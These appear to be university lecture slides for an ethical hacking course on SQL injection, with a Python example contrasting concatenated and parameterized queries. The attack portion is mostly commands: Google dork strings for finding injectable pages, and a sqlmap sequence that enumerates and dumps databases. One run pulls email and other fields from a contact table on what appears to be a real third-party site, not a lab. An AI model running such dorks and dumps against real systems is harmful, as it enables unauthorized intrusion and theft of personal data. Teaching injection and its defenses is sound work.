Introduction to Web Security and Attacks
Honours Course – Ethical Hacking
Suvarna Chaure
Assistant Professor
Dept. of Computer Engineering,
SIES Graduate School of Technology
Topics
OWASP, Web Security Considerations, User Authentication, Cookies, SSL,
HTTPS, Privacy on Web, Account Harvesting, Web Bugs, Sniffing, ARP
poisoning, Denial of service attacks, Hacking Web Applications,
Clickjacking, Cross-Site scripting and Request Forgery, Session Hijacking
and Management, Phishing and Pharming Techniques, SSO, Vulnerability
assessments, SQL injection, Web Service Security, OAuth 2.0,
Demonstration of hacking tools on Kali Linux such as SQLMap, HTTrack,
hping, Burp Suite, Wireshark etc.
Learning Outcomes: Students should be able to perform an SQL injection attack using the sqlmap tool.
Agenda
• Introduction to SQL injection Attack
• Google Dorking
• Vulnerable Site
• Installation of Sqlmap
• SQL injection using Sqlmap
• Demonstration using Different Websites
SQL Injection Attack
Basics of SQL Injection Attack
1. What are injection attacks?
2. How does SQL injection work?
Injection
Injection attacks trick an application into including unintended commands in the data sent to an interpreter.
Interpreters interpret strings as commands.
Ex: SQL, shell ([Link], bash).
Key Idea
Input data from the application is executed as code by the interpreter.
An important injectable string is: 1'or'1'='1.
SQL Injection
1. App sends form to user.
2. Attacker submits form with SQL exploit data.
3. Application builds string with exploit data.
4. Application sends SQL query to DB.
5. DB executes query, including exploit, sends data back to application.
6. Application returns data to user.
[Figure: Attacker, Form (User; Pass ' or 1=1--), Firewall, Web Server, DB Server]
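The six steps above, as an added example that is not part of the original slides: a login check that builds its SQL string by concatenation, next to the parameterized form, run against both injectable strings quoted on the slides. The table, function names and sample rows are constructed for illustration, and an in-memory SQLite database stands in for the DB server.

```python
import sqlite3

def make_db():
    """Build an in-memory users table (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "s3cret"), ("bob", "hunter2")])
    return db

def login_vulnerable(db, name, password):
    """Step 3 on the slide: the application builds the SQL string from input."""
    query = ("SELECT name FROM users WHERE name = '" + name +
             "' AND password = '" + password + "'")
    return query, db.execute(query).fetchall()

def login_parameterized(db, name, password):
    """Hardened form: input is bound as data and never parsed as SQL."""
    query = "SELECT name FROM users WHERE name = ? AND password = ?"
    return query, db.execute(query, (name, password)).fetchall()

if __name__ == "__main__":
    db = make_db()
    # A correct password, a wrong one, and the two strings from the slides.
    for pw in ("s3cret", "wrong", "1'or'1'='1", "' or 1=1--"):
        _, weak = login_vulnerable(db, "alice", pw)
        _, safe = login_parameterized(db, "alice", pw)
        print(f"{pw!r:16} concatenated={weak} parameterized={safe}")
```

With concatenation, the quote in the input closes the string literal, so the rest of the input changes the WHERE clause and every row matches; with bound parameters the same input is compared as a literal password and matches nothing.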
Why SQL injection?
Identify injectable parameters.
Identify the database type and version.
Discover the database schema.
Extract data.
Insert, modify or delete data.
Denial of service to authorized users by locking or deleting tables.
Example of SQL Injection
More malicious example
Procedure for SQL injection
Step 1: Finding Vulnerable Website
Some Examples:
inurl:[Link]?id=
inurl:[Link]?id=
inurl:[Link]?id=
inurl:pageid=
Sqlmap for SQL injection attack
Sqlmap is written in Python, so the first thing you need is the Python interpreter.
Download the Python interpreter from [Link]. There are two series of Python, 2.7.x and 3.3.x. Sqlmap should run fine with either, so download and install one.
Next, download the sqlmap zip file from [Link] and extract it into any directory.
Launch the DOS prompt and navigate to the sqlmap directory.
Now run the [Link] script with the Python interpreter.
Continue...
It checks the input parameters to find whether they are vulnerable to SQL injection. In the process, sqlmap is also able to identify the remote system OS, database name and version.
C:\sqlmapproject-sqlmap-756f02f>[Link] -u "[Link][Link]?cat=1"
Discover Databases
C:\sqlmapproject-sqlmap-756f02f>[Link] -u "[Link] --dbs
Find tables in a particular database
C:\sqlmapproject-sqlmap-756f02f>[Link] -u "[Link]cat=1" --tables -D acuart
Get columns of a table
C:\sqlmapproject-sqlmap-756f02f>[Link] -u "[Link]cat=1" --columns -D acuart -T artists
Get data from a table
C:\sqlmapproject-sqlmap-756f02f>[Link] -u "[Link]cat=1" --dump -D acuart -T artists
Continue....
[Link] -u "[Link] --dbs
[Link] -u "[Link] -D romanian_svc --tables
[Link] -u "[Link] -D romanian_svc -T ra_contact --columns
[Link] -u "[Link] -D romanian_svc -T ra_contact -C email,functie,id,[Link] --dump
Thank You!
(suvarnacl@[Link])